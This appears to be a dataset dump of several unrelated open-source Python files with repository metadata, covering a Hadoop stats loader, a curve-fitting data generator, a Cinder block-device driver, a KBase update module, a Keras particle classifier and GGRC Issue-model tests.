self.need_parent_index.append(DIM_LIST.index(item))
self.need_relate_index = []
for item in NEED_RELATE:
self.need_relate_index.append(DIM_LIST.index(item))
pass
def load(self, lines):
"""
加载数据
"""
for line in lines:
line = line.strip().decode('utf-8')
dim_sum, dim_key, value_list, value_sum = self.parse(line)
this_map = self.term_map[dim_sum]
if dim_sum == 0:
self.term_map[dim_sum] = value_sum
continue
if dim_key not in this_map:
this_map[dim_key] = {}
this_dim = this_map[dim_key]
this_dim[u'.'.join(value_list)] = value_sum
# 添加父级统计
for key, index in enumerate(self.need_parent_index):
if dim_key & ( 1 << index ):
t = 0
for i in xrange(index):
if dim_key & ( 1 << i):
t += 1
# print t
# print value_list
# 获取所有的父级value
parent = Parent.mapping_value(DIM_LIST[index], value_list[t])
if not parent:
continue
parent_value_list = value_list
for p in parent:
parent_value_list[t] = p
parent_value_key = '.'.join(parent_value_list)
if parent_value_key not in this_dim:
this_dim[parent_value_key] = 0
this_dim[parent_value_key] += value_sum
def get_sum(self, field_map):
"""
获取定向总数
"""
dim_sum = len(field_map.keys())
this_map = self.term_map[dim_sum]
if dim_sum == 0:
#print this_map
return this_map
dim_key, value_list = self.get_key(field_map)
value_key = u'.'.join(value_list)
#print field_map
#print dim_key, value_key
if dim_key not in this_map:
return 0
if value_key not in this_map[dim_key]:
return 0
return this_map[dim_key][value_key]
def get_group(self, dim):
index = DIM_LIST.index(dim)
dim_key = 0 | 1 << index
this_map = self.term_map[1]
if dim_key not in this_map:
return []
group_list = []
for key, value in this_map[dim_key].items():
group_list.append((key,value))
return group_list
@staticmethod
def get_key(term_map):
dim_key = 0
value_list = []
#print term_map
for dim, value in term_map.items():
index = DIM_LIST.index(dim)
dim_key |= 1 << index
value_list.append(value)
return dim_key, value_list
def parse(self, string):
info = string.split("\t")
dim_info = info[0].split('.')
dim_sum = len(dim_info) - 1
dim_key = int(dim_info[0])
value_list = dim_info[1:]
for key, index in enumerate(self.need_relate_index):
if dim_key & ( 1 << index ):
t = 0
for i in xrange(index):
if dim_key & ( 1 << i):
t += 1
value_list[t] = str(Relative.mapping_value(DIM_LIST[index], value_list[t]))
return dim_sum, dim_key, value_list, int(info[1])
def reload(self):
self.term_map = [0, {}, {}, {}, {}, {}]
files = os.listdir(DATA_DIR)
for f in files:
fo = open(DATA_DIR + f, 'r')
lines = fo.readlines()
fo.close()
self.load(lines)
def init_hapood():
data = HadoopData()
data.reload()
| 34.139241
| 117
| 0.50927
|
4a36d80f13469b66c184e6d25b179945c9df47d1
| 1,017
|
py
|
Python
|
cma-es/cma&mse&quad&pow/Ss.py
|
luzhijun/-
|
c9a7f39fd033a3ba3c57acbbd309c05ac17e6bef
|
[
"Apache-2.0"
] | 17
|
2016-11-18T03:15:14.000Z
|
2022-01-09T07:50:56.000Z
|
cma-es/cma&mse&quad&pow/Ss.py
|
luzhijun/-
|
c9a7f39fd033a3ba3c57acbbd309c05ac17e6bef
|
[
"Apache-2.0"
] | null | null | null |
cma-es/cma&mse&quad&pow/Ss.py
|
luzhijun/-
|
c9a7f39fd033a3ba3c57acbbd309c05ac17e6bef
|
[
"Apache-2.0"
] | 7
|
2016-11-20T10:20:57.000Z
|
2021-04-20T05:29:57.000Z
|
#!usr/bin/env python
#encoding: utf-8
__author__="luzhijun"
'''
产生数据集合,dataSet[0:3]使用多项式函数产生噪点数据;dataSet[3:6]使用指数函数产生噪点数据;
realDataSet[0]存放多项式函数产生真实数据,realDataSet[1]存放指数函数产生真实数据
'''
import funcs
import numpy as np
x1=np.linspace(0,20,150)
x2=np.hstack((np.random.exponential(5,300),x1))
x2.sort()
x3=np.hstack((np.random.exponential(1,300),x1))
x3.sort()
x4=np.linspace(0,20,150)
x5=np.hstack((np.random.exponential(5,300),x4))
x5.sort()
x6=np.hstack((np.random.exponential(1,300),x4))
x6.sort()
dataSet=[]
p1=[2,1,0] #多项式函数参数
p2=[0.5,2] #指数函数参数
y1=list(map(funcs.f11(p1),x1))
dataSet.append([x1,y1])
y2=list(map(funcs.f11(p1),x2))
dataSet.append([x2,y2])
y3=list(map(funcs.f11(p1),x3))
dataSet.append([x3,y3])
y4=list(map(funcs.f21(p2),x4))
dataSet.append([x4,y4])
y5=list(map(funcs.f21(p2),x5))
dataSet.append([x5,y5])
y6=list(map(funcs.f21(p2),x6))
dataSet.append([x6,y6])
realDataSet=[]
y1r=list(map(funcs.f1(p1),x1))
realDataSet.append([x1,y1r])
y2r=list(map(funcs.f2(p2),x4))
realDataSet.append([x4,y2r])
| 22.6
| 58
| 0.711898
|
bf6840aef5379a3539fe14e0205bf1725f85f79e
| 8,666
|
py
|
Python
|
cinder/volume/drivers/block_device.py
|
rackerlabs/cinder
|
4295ff0a64f781c3546f6c6e0816dbb8100133cb
|
[
"Apache-2.0"
] | 1
|
2019-02-08T05:24:58.000Z
|
2019-02-08T05:24:58.000Z
|
cinder/volume/drivers/block_device.py
|
rackerlabs/cinder
|
4295ff0a64f781c3546f6c6e0816dbb8100133cb
|
[
"Apache-2.0"
] | null | null | null |
cinder/volume/drivers/block_device.py
|
rackerlabs/cinder
|
4295ff0a64f781c3546f6c6e0816dbb8100133cb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2013 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import importutils
from cinder import context
from cinder.db.sqlalchemy import api
from cinder import exception
from cinder.i18n import _, _LI
from cinder.image import image_utils
from cinder.volume import driver
from cinder.volume import utils as volutils
LOG = logging.getLogger(__name__)
volume_opts = [
cfg.ListOpt('available_devices',
default=[],
help='List of all available devices'),
]
CONF = cfg.CONF
CONF.register_opts(volume_opts)
class BlockDeviceDriver(driver.BaseVD, driver.LocalVD, driver.CloneableVD,
driver.CloneableImageVD, driver.TransferVD):
VERSION = '2.1.0'
def __init__(self, *args, **kwargs):
super(BlockDeviceDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(volume_opts)
self.backend_name = \
self.configuration.safe_get('volume_backend_name') or "BlockDev"
target_driver =\
self.target_mapping[self.configuration.safe_get('iscsi_helper')]
self.target_driver = importutils.import_object(
target_driver,
configuration=self.configuration,
db=self.db,
executor=self._execute)
def check_for_setup_error(self):
pass
def create_volume(self, volume):
device = self.find_appropriate_size_device(volume['size'])
LOG.info(_LI("Create %(volume)s on %(device)s"),
{"volume": volume['name'], "device": device})
return {
'provider_location': device,
}
def delete_volume(self, volume):
"""Deletes a logical volume."""
dev_path = self.local_path(volume)
if not dev_path or dev_path not in \
self.configuration.available_devices:
return
if os.path.exists(dev_path) and \
self.configuration.volume_clear != 'none':
volutils.clear_volume(
self._get_device_size(dev_path), dev_path,
volume_clear=self.configuration.volume_clear,
volume_clear_size=self.configuration.volume_clear_size)
def local_path(self, volume):
if volume['provider_location']:
path = volume['provider_location'].rsplit(" ", 1)
return path[-1]
else:
return None
def copy_image_to_volume(self, context, volume, image_service, image_id):
"""Fetch the image from image_service and write it to the volume."""
image_utils.fetch_to_raw(context,
image_service,
image_id,
self.local_path(volume),
self.configuration.volume_dd_blocksize,
size=volume['size'])
def copy_volume_to_image(self, context, volume, image_service, image_meta):
"""Copy the volume to the specified image."""
image_utils.upload_volume(context,
image_service,
image_meta,
self.local_path(volume))
def create_cloned_volume(self, volume, src_vref):
LOG.info(_LI('Creating clone of volume: %s'), src_vref['id'])
device = self.find_appropriate_size_device(src_vref['size'])
volutils.copy_volume(
self.local_path(src_vref), device,
self._get_device_size(device) * 2048,
self.configuration.volume_dd_blocksize,
execute=self._execute)
return {
'provider_location': device,
}
def get_volume_stats(self, refresh=False):
if refresh:
self._update_volume_stats()
return self._stats
def _update_volume_stats(self):
"""Retrieve stats info from volume group."""
dict_of_devices_sizes = self._devices_sizes()
used_devices = self._get_used_devices()
total_size = 0
free_size = 0
for device, size in dict_of_devices_sizes.items():
if device not in used_devices:
free_size += size
total_size += size
LOG.debug("Updating volume stats")
backend_name = self.configuration.safe_get('volume_backend_name')
data = {'total_capacity_gb': total_size / 1024,
'free_capacity_gb': free_size / 1024,
'reserved_percentage': self.configuration.reserved_percentage,
'QoS_support': False,
'volume_backend_name': backend_name or self.__class__.__name__,
'vendor_name': "Open Source",
'driver_version': self.VERSION,
'storage_protocol': 'unknown'}
self._stats = data
def _get_used_devices(self):
lst = api.volume_get_all_by_host(context.get_admin_context(),
self.host)
used_devices = set()
for volume in lst:
local_path = self.local_path(volume)
if local_path:
used_devices.add(local_path)
return used_devices
def _get_device_size(self, dev_path):
out, _err = self._execute('blockdev', '--getsz', dev_path,
run_as_root=True)
size_in_m = int(out)
return size_in_m / 2048
def _devices_sizes(self):
available_devices = self.configuration.available_devices
dict_of_devices_sizes = {}
for device in available_devices:
dict_of_devices_sizes[device] = self._get_device_size(device)
return dict_of_devices_sizes
def find_appropriate_size_device(self, size):
dict_of_devices_sizes = self._devices_sizes()
free_devices = (set(self.configuration.available_devices) -
self._get_used_devices())
if not free_devices:
raise exception.CinderException(_("No free disk"))
possible_device = None
possible_device_size = None
for device in free_devices:
dev_size = dict_of_devices_sizes[device]
if size * 1024 <= dev_size and (possible_device is None or
dev_size < possible_device_size):
possible_device = device
possible_device_size = dev_size
if possible_device:
return possible_device
else:
raise exception.CinderException(_("No big enough free disk"))
# ####### Interface methods for DataPath (Target Driver) ########
def ensure_export(self, context, volume):
volume_path = self.local_path(volume)
model_update = \
self.target_driver.ensure_export(
context,
volume,
volume_path)
return model_update
def create_export(self, context, volume, connector):
volume_path = self.local_path(volume)
export_info = self.target_driver.create_export(context,
volume,
volume_path)
return {
'provider_location': export_info['location'] + ' ' + volume_path,
'provider_auth': export_info['auth'],
}
def remove_export(self, context, volume):
self.target_driver.remove_export(context, volume)
def initialize_connection(self, volume, connector):
if connector['host'] != volutils.extract_host(volume['host'], 'host'):
return self.target_driver.initialize_connection(volume, connector)
else:
return {
'driver_volume_type': 'local',
'data': {'device_path': self.local_path(volume)},
}
def validate_connector(self, connector):
return self.target_driver.validate_connector(connector)
def terminate_connection(self, volume, connector, **kwargs):
pass
| 37.842795
| 79
| 0.608701
|
221235b5ad45cb338763c2710a5eb813260a6298
| 6,931
|
py
|
Python
|
lib/relation_engine_bulk_update/relation_engine_bulk_updateImpl.py
|
kbaseapps/relation_engine_bulk_update
|
04638d3d9e87eb9dc5afe30f96d1e4b84f633b8b
|
[
"MIT"
] | null | null | null |
lib/relation_engine_bulk_update/relation_engine_bulk_updateImpl.py
|
kbaseapps/relation_engine_bulk_update
|
04638d3d9e87eb9dc5afe30f96d1e4b84f633b8b
|
[
"MIT"
] | null | null | null |
lib/relation_engine_bulk_update/relation_engine_bulk_updateImpl.py
|
kbaseapps/relation_engine_bulk_update
|
04638d3d9e87eb9dc5afe30f96d1e4b84f633b8b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#BEGIN_HEADER
import ujson
import logging
import os
from installed_clients.CatalogClient import Catalog
from installed_clients.KBaseReportClient import KBaseReport
from installed_clients.WorkspaceClient import Workspace
from relation_engine_bulk_update.genome_collections import update_ncbi_genomes
from relation_engine_bulk_update.type_collections import update_type_collections
from relation_engine_bulk_update.workspace_object_collections import update_ws_object_collections
from relation_engine_bulk_update.sdk_module_collections import update_sdk_module_collections
#END_HEADER
class relation_engine_bulk_update:
'''
Module Name:
relation_engine_bulk_update
Module Description:
A KBase module: relation_engine_bulk_update
'''
######## WARNING FOR GEVENT USERS ####### noqa
# Since asynchronous IO can lead to methods - even the same method -
# interrupting each other, you must be *very* careful when using global
# state. A method could easily clobber the state set by another while
# the latter method is running.
######################################### noqa
VERSION = "0.0.1"
GIT_URL = "https://github.com/kbaseapps/relation_engine_bulk_update.git"
GIT_COMMIT_HASH = "06f2ee2bace04fe55436309e114de1300aed5c66"
#BEGIN_CLASS_HEADER
# Class variables and functions can be defined in this block
def make_report(self, message, ws_id):
report_info = self.kb_report.create(
{'report': {'objects_created': [],
'text_message': message},
'workspace_id': ws_id})
return {
'report_name': report_info['name'],
'report_ref': report_info['ref'],
}
#END_CLASS_HEADER
# config contains contents of config file in a hash or None if it couldn't
# be found
def __init__(self, config):
#BEGIN_CONSTRUCTOR
# Any configuration parameters that are important should be parsed and
# saved in the constructor.
self.callback_url = os.environ['SDK_CALLBACK_URL']
self.shared_folder = config['scratch']
self.re_api_url = config['re-api-url']
self.catalog = Catalog(config['catalog-url'])
self.ws = Workspace(config['workspace-url'])
self.kb_report = KBaseReport(self.callback_url)
logging.basicConfig(level=logging.INFO)
#END_CONSTRUCTOR
pass
def update_type_collections(self, ctx, params):
"""
Updates type mappings. Currently only requires a ws_id for the report
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN update_type_collections
message = update_type_collections(self.ws, self.re_api_url, ctx['token'])
logging.info(message)
output = self.make_report(message, params['workspace_id'])
#END update_type_collections
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method update_type_collections return value ' +
'output is not type dict as required.')
# return the results
return [output]
def update_sdk_module_collections(self, ctx, params):
"""
Updates sdk module mappings. Currently only requires a ws_id for the report
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN update_sdk_module_collections
message = update_sdk_module_collections(self.catalog, self.re_api_url, ctx['token'])
logging.info(message)
output = self.make_report(message, params['workspace_id'])
#END update_sdk_module_collections
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method update_sdk_module_collections return value ' +
'output is not type dict as required.')
# return the results
return [output]
def update_ws_provenance(self, ctx, params):
"""
Updates the provenance relationships for workspace objects. Currently only requires a ws_id for the report
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN update_ws_provenance
parsed_params = ujson.loads(params['list_ws_params'])
message = update_ws_object_collections(self.ws, self.re_api_url, ctx['token'],
parsed_params)
logging.info(message)
output = self.make_report(message, params['workspace_id'])
#END update_ws_provenance
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method update_ws_provenance return value ' +
'output is not type dict as required.')
# return the results
return [output]
def update_ncbi_genomes(self, ctx, params):
"""
Updates the ncbi_genomes. Currently only requires a ws_id for the report and a list of genome_names
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN update_ncbi_genomes
message = update_ncbi_genomes(self.ws, self.re_api_url, ctx['token'], params)
logging.info(message)
output = {}
#END update_ncbi_genomes
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method update_ncbi_genomes return value ' +
'output is not type dict as required.')
# return the results
return [output]
def status(self, ctx):
#BEGIN_STATUS
returnVal = {'state': "OK",
'message': "",
'version': self.VERSION,
'git_url': self.GIT_URL,
'git_commit_hash': self.GIT_COMMIT_HASH}
#END_STATUS
return [returnVal]
| 41.502994
| 114
| 0.654307
|
54ae3700c4d1684b98156e9d439499b64165f241
| 9,991
|
py
|
Python
|
train/gen/adv/models/particles/v4_noetaphi_trunc7_limit100/lib.py
|
sammysiegel/SubtLeNet
|
94d1507a8a7c60548b59400109b6c4086ad83141
|
[
"MIT"
] | null | null | null |
train/gen/adv/models/particles/v4_noetaphi_trunc7_limit100/lib.py
|
sammysiegel/SubtLeNet
|
94d1507a8a7c60548b59400109b6c4086ad83141
|
[
"MIT"
] | null | null | null |
train/gen/adv/models/particles/v4_noetaphi_trunc7_limit100/lib.py
|
sammysiegel/SubtLeNet
|
94d1507a8a7c60548b59400109b6c4086ad83141
|
[
"MIT"
] | 2
|
2019-07-08T20:18:22.000Z
|
2020-06-01T20:04:08.000Z
|
#!/usr/bin/env python2.7
from _common import *
from ..generators.gen import make_coll, generate, get_dims
from ..generators import gen as generator
'''
some global definitions
'''
NEPOCH = 50
VERSION = 4
MODELDIR = environ.get('MODELDIR', 'models/') + '/particles/'
BASEDIR = environ['BASEDIR']
OPTIMIZER = 'Adam'
_APOSTLE = None
train_opts = {
'learn_mass' : True,
'learn_pt' : True,
}
# must be called!
def instantiate(trunc=4, limit=50):
global _APOSTLE
generator.truncate = trunc
config.limit = limit
_APOSTLE = 'v%s_trunc%i_limit%i'%(str(VERSION), generator.truncate, config.limit)
system('mkdir -p %s/%s/'%(MODELDIR,_APOSTLE))
system('cp -v %s %s/%s/trainer.py'%(sys.argv[0], MODELDIR, _APOSTLE))
system('cp -v %s %s/%s/lib.py'%(__file__.replace('.pyc','.py'), MODELDIR, _APOSTLE))
# instantiate data loaders
top = make_coll(BASEDIR + '/PARTITION/Top_*_CATEGORY.npy')
qcd = make_coll(BASEDIR + '/PARTITION/QCD_*_CATEGORY.npy')
data = [top, qcd]
dims = get_dims(top)
with open('%s/%s/setup.py'%(MODELDIR, _APOSTLE),'w') as fsetup:
fsetup.write('''
from subtlenet import config
from subtlenet.generators import gen as generator
from subtlenet.utils import set_processor
config.limit = %i
generator.truncate = %i
set_processor("%s")
'''%(config.limit, generator.truncate, utils.get_processor()))
return data, dims
'''
first build the classifier!
'''
# set up data
def setup_data(data):
opts = {}; opts.update(train_opts)
gen = {
'train' : generate(data, partition='train', batch=500, **opts),
'validation' : generate(data, partition='validate', batch=2000, **opts),
'test' : generate(data, partition='test', batch=10, **opts),
}
return gen
def setup_adv_data(data):
opts = {'decorr_mass':True,
'window':True}
opts.update(train_opts)
gen = {
'train' : generate(data, partition='train', batch=1000, **opts),
'validation' : generate(data, partition='validate', batch=2000, **opts),
'test' : generate(data, partition='test', batch=10, **opts),
}
return gen
def compilation_args(name, **kwargs):
if name == 'classifier':
return {
'optimizer' : getattr(keras_objects, OPTIMIZER)(lr=0.0005),
'loss' : 'categorical_crossentropy',
'metrics' : ['accuracy']
}
if name == 'adversary':
N = range(kwargs['N'])
return {
'optimizer' : getattr(keras_objects, OPTIMIZER)(lr=0.00025),
'loss' : ['categorical_crossentropy'] + [kwargs['loss'] for _ in N],
'loss_weights' : [kwargs['w_clf']] + [kwargs['w_adv'] for _ in N]
}
# this is purely a discriminatory classifier
def build_classifier(dims):
input_particles = Input(shape=(dims[1], dims[2]), name='input_particles')
input_mass = Input(shape=(1,), name='input_mass')
input_pt = Input(shape=(1,), name='input_pt')
inputs = [input_particles, input_mass, input_pt]
LSTMImplementation = CuDNNLSTM if (utils.get_processor() == 'gpu') else LSTM
# now build the particle network
h = BatchNormalization(momentum=0.6, name='f_bn0')(input_particles)
h = Conv1D(32, 2, activation='relu', kernel_initializer='lecun_uniform',
padding='same', name='f_c0')(h)
h = BatchNormalization(momentum=0.6, name='f_bn1')(h)
h = Conv1D(16, 4, activation='relu', kernel_initializer='lecun_uniform',
padding='same', name='f_c1')(h)
h = BatchNormalization(momentum=0.6, name='f_bn2')(h)
h = LSTMImplementation(100, name='f_lstm')(h)
h = BatchNormalization(momentum=0.6, name='f_bn3')(h)
h = Dense(100, activation='relu', kernel_initializer='lecun_uniform', name='f_d0')(h)
h = BatchNormalization(momentum=0.6, name='f_bn4')(h)
h = Dense(50, activation='relu', kernel_initializer='lecun_uniform', name='f_d1')(h)
h = BatchNormalization(momentum=0.6, name='f_bn5')(h)
h = Dense(50, activation='relu', kernel_initializer='lecun_uniform', name='f_d2')(h)
h = BatchNormalization(momentum=0.6, name='f_bn6')(h)
h = Dense(10, activation='relu', kernel_initializer='lecun_uniform', name='f_d3')(h)
h = BatchNormalization(momentum=0.6, name='f_bn7')(h)
particles_final = h
# merge everything
to_merge = [particles_final, input_mass, input_pt]
h = concatenate(to_merge, name='f_cc0')
for i in xrange(2):
h = Dense(50, activation='tanh', name='u_xd%i'%i)(h)
h = BatchNormalization(momentum=0.6, name='u_xbn%i'%i)(h)
y_hat = Dense(config.n_truth, activation='softmax', name='y_hat')(h)
classifier = Model(inputs=inputs, outputs=[y_hat])
for l in classifier.layers:
l.freezable = l.name.startswith('f_')
#classifier.compile(optimizer=Adam(lr=0.0002),
classifier.compile(**compilation_args('classifier'))
print '########### CLASSIFIER ############'
classifier.summary()
print '###################################'
return classifier
def build_adversary(clf, loss, scale, w_clf, w_adv, n_outputs=1):
if loss == 'mean_squared_error':
config.n_decorr_bins = 1
y_hat = clf.outputs[0]
inputs= clf.inputs
kin_hats = Adversary(config.n_decorr_bins, n_outputs=1, scale=scale)(y_hat)
adversary = Model(inputs=inputs,
outputs=[y_hat]+kin_hats)
adversary.compile(**compilation_args('adversary',
w_clf=w_clf,
w_adv=w_adv,
N=n_outputs,
loss=loss))
print '########### ADVERSARY ############'
adversary.summary()
print '###################################'
return adversary
def build_old_classifier(dims):
input_particles = Input(shape=(dims[1], dims[2]), name='input_particles')
input_mass = Input(shape=(1,), name='input_mass')
input_pt = Input(shape=(1,), name='input_pt')
inputs = [input_particles, input_mass, input_pt]
# now build the particle network
h = BatchNormalization(momentum=0.6)(input_particles)
h = Conv1D(32, 2, activation='relu', kernel_initializer='lecun_uniform', padding='same')(h)
h = BatchNormalization(momentum=0.6)(h)
h = Conv1D(16, 4, activation='relu', kernel_initializer='lecun_uniform', padding='same')(h)
h = BatchNormalization(momentum=0.6)(h)
h = CuDNNLSTM(100)(h)
h = BatchNormalization(momentum=0.6)(h)
h = Dense(100, activation='relu', kernel_initializer='lecun_uniform')(h)
particles_final = BatchNormalization(momentum=0.6)(h)
# merge everything
to_merge = [particles_final, input_mass, input_pt]
h = concatenate(to_merge)
for i in xrange(1,5):
h = Dense(50, activation='tanh')(h)
# if i%2:
# h = Dropout(0.1)(h)
h = BatchNormalization(momentum=0.6)(h)
y_hat = Dense(config.n_truth, activation='softmax', name='y_hat')(h)
classifier = Model(inputs=inputs, outputs=[y_hat])
#classifier.compile(optimizer=Adam(lr=0.0002),
classifier.compile(optimizer=getattr(keras_objects, OPTIMIZER)(lr=0.0005),
loss='categorical_crossentropy',
metrics=['accuracy'])
print '########### CLASSIFIER ############'
classifier.summary()
print '###################################'
return classifier
def partial_freeze(model, compargs):
clone = Model(inputs=model.inputs, outputs=model.outputs)
for l in clone.layers:
if hasattr(l, 'freezable') and l.freezable:
l.trainable = False
clone.compile(**compargs)
return clone
# train any model
def train(model, name, train_gen, validation_gen, save_clf_params=None):
if save_clf_params is not None:
callbacks = [PartialModelCheckpoint(filepath='%s/%s/%s_clf_best.h5'%(MODELDIR,_APOSTLE,name),
save_best_only=True, verbose=True,
**save_clf_params)]
save_clf = save_clf_params['partial_model']
else:
save_clf = model
callbacks = []
callbacks += [ModelCheckpoint('%s/%s/%s_best.h5'%(MODELDIR,_APOSTLE,name),
save_best_only=True, verbose=True)]
def save_classifier(name_=name, model_=save_clf):
model_.save('%s/%s/%s.h5'%(MODELDIR,_APOSTLE,name_))
def save_and_exit(signal=None, frame=None):
save_classifier()
exit(1)
signal.signal(signal.SIGINT, save_and_exit)
model.fit_generator(train_gen,
steps_per_epoch=3000,
epochs=NEPOCH,
validation_data=validation_gen,
validation_steps=2000,
callbacks = callbacks,
)
save_classifier()
def infer(modelh5, name):
model = load_model(modelh5,
custom_objects={'DenseBroadcast':DenseBroadcast,
'GradReverseLayer':GradReverseLayer})
model.summary()
coll = generator.make_coll(BASEDIR + '/PARTITION/*_CATEGORY.npy')
msd_norm_factor = 1. / config.max_mass
pt_norm_factor = 1. / (config.max_pt - config.min_pt)
msd_index = config.gen_singletons['msd']
pt_index = config.gen_singletons['pt']
def predict_t(data):
msd = data['singletons'][:,msd_index] * msd_norm_factor
pt = (data['singletons'][:,pt_index] - config.min_pt) * pt_norm_factor
if msd.shape[0] > 0:
particles = data['particles'][:,:config.limit,:generator.truncate]
r_t = model.predict([particles,msd,pt])[:,config.n_truth-1]
else:
r_t = np.empty((0,))
return r_t
print 'loaded from',modelh5,
print 'saving to',name
coll.infer(['singletons','particles'], f=predict_t, name=name, partition='test')
| 36.068592
| 102
| 0.610049
|
446fb4a33cf0356102d8955b158c6b5f39970224
| 15,442
|
py
|
Python
|
test/integration/ggrc/models/test_issue.py
|
HLD/ggrc-core
|
9bdc0fc6ca9e252f4919db682d80e360d5581eb4
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/integration/ggrc/models/test_issue.py
|
HLD/ggrc-core
|
9bdc0fc6ca9e252f4919db682d80e360d5581eb4
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2018-07-06T00:04:23.000Z
|
2021-02-26T21:13:20.000Z
|
test/integration/ggrc/models/test_issue.py
|
HLD/ggrc-core
|
9bdc0fc6ca9e252f4919db682d80e360d5581eb4
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2017-11-11T22:16:56.000Z
|
2017-11-11T22:16:56.000Z
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Tests for Issue model."""
from ggrc import db
from ggrc.models import all_models
from integration.ggrc import generator
from integration.ggrc import TestCase, Api
from integration.ggrc.models import factories
class TestIssue(TestCase):
""" Test Issue class. """
def setUp(self):
super(TestIssue, self).setUp()
self.api = Api()
with factories.single_commit():
audit = factories.AuditFactory()
for status in all_models.Issue.VALID_STATES:
factories.IssueFactory(audit=audit, status=status)
def test_filter_by_status(self):
"""Test Issue filtering by status."""
query_request_data = [{
'fields': [],
'filters': {
'expression': {
'left': {
'left': 'status',
'op': {'name': '='},
'right': 'Fixed'
},
'op': {'name': 'OR'},
'right': {
'left': 'status',
'op': {'name': '='},
'right': 'Fixed and Verified'
},
},
},
'object_name': 'Issue',
'permissions': 'read',
'type': 'values',
}]
response = self.api.send_request(
self.api.client.post,
data=query_request_data,
api_link="/query"
)
self.assertEqual(response.status_code, 200)
statuses = {i["status"] for i in response.json[0]["Issue"]["values"]}
self.assertEqual(statuses, {"Fixed", "Fixed and Verified"})
class TestIssueAuditMapping(TestCase):
"""Test suite to check the rules for Issue-Audit mappings."""
# pylint: disable=invalid-name
def setUp(self):
super(TestIssueAuditMapping, self).setUp()
self.generator = generator.ObjectGenerator(fail_no_json=False)
control = factories.ControlFactory()
revision = all_models.Revision.query.filter(
all_models.Revision.resource_type == control.type,
all_models.Revision.resource_id == control.id,
).first()
with factories.single_commit():
self.audit = factories.AuditFactory()
self.snapshot = factories.SnapshotFactory(parent=self.audit,
revision=revision)
self.other_audits = [factories.AuditFactory() for _ in range(2)]
self.issue_mapped = factories.IssueFactory()
self.issue_unmapped = factories.IssueFactory()
self.issue_audit_mapping = factories.RelationshipFactory(
source=self.audit,
destination=self.issue_mapped,
context=self.audit.context,
)
def test_map_to_audit(self):
"""Issue can be mapped to an Audit."""
response, _ = self.generator.generate_relationship(
source=self.audit,
destination=self.issue_unmapped,
context=self.audit.context,
)
self.assertStatus(response, 201)
def test_unmap_from_audit(self):
"""Issue can be unmapped from an Audit."""
response = self.generator.api.delete(self.issue_audit_mapping)
self.assert200(response)
def test_populate_audit_and_context(self):
"""Issue mapped to Audit -> Issue audit_id and context_id are set."""
response, _ = self.generator.generate_relationship(
source=self.audit,
destination=self.issue_unmapped,
context=self.audit.context,
)
self.assertStatus(response, 201)
self.issue_unmapped = self.refresh_object(self.issue_unmapped)
self.assertEqual(self.issue_unmapped.audit_id, self.audit.id)
self.assertEqual(self.issue_unmapped.context_id, self.audit.context_id)
def test_unpopulate_audit_and_context(self):
"""Issue unmapped from Audit -> Issue audit_id and context_id are unset."""
# workaround to make sure the id is fetched from the db
id_ = self.issue_mapped.id
self.generator.api.delete(self.issue_audit_mapping)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=id_)
self.assertIs(self.issue_mapped.audit_id, None)
self.assertIs(self.issue_mapped.context_id, None)
def test_post_issue_with_audit_set(self):
"""Issue isn't mapped to Audit by POSTing with audit field."""
response, issue = self.generator.generate_object(
all_models.Issue,
{"audit": {"type": "Audit", "id": self.audit.id}},
)
self.assertStatus(response, 201)
rel = all_models.Relationship
source_tuple = rel.source_type, rel.source_id
destination_tuple = rel.destination_type, rel.destination_id
audit_tuple = "Audit", self.audit.id
issue_tuple = "Issue", issue.id
self.assertEqual(rel.query.filter(
source_tuple == audit_tuple and destination_tuple == issue_tuple or
destination_tuple == audit_tuple and source_tuple == issue_tuple
).count(), 0)
def test_deny_mapping_to_two_audits(self):
"""Issue can't be mapped to two Audits at once."""
issue_stub = self.generator.create_stub(self.issue_unmapped)
audit_stubs = [self.generator.create_stub(a) for a in self.other_audits]
response, _ = self.generator.generate_relationship(
source=self.other_audits[0],
destination=self.issue_mapped,
context=self.other_audits[0].context,
)
self.assert400(response)
response = self.generator.api.post(
all_models.Relationship,
[{"source": issue_stub,
"destination": audit_stubs[0],
"context": None},
{"source": issue_stub,
"destination": audit_stubs[1],
"context": None}],
)
self.assert400(response)
def test_deny_unmapping_from_audit_asmt(self):
"""Issue can't be unmapped from Audit if has common Assessment."""
with factories.single_commit():
assessment = factories.AssessmentFactory(audit=self.audit)
factories.RelationshipFactory(source=assessment, destination=self.audit,
context=self.audit.context)
factories.RelationshipFactory(source=assessment,
destination=self.issue_mapped,
context=self.audit.context)
response = self.generator.api.delete(self.issue_audit_mapping)
self.assert400(response)
def test_deny_unmapping_from_audit_snapshot(self):
"""Issue can't be unmapped from Audit if has common Snapshot."""
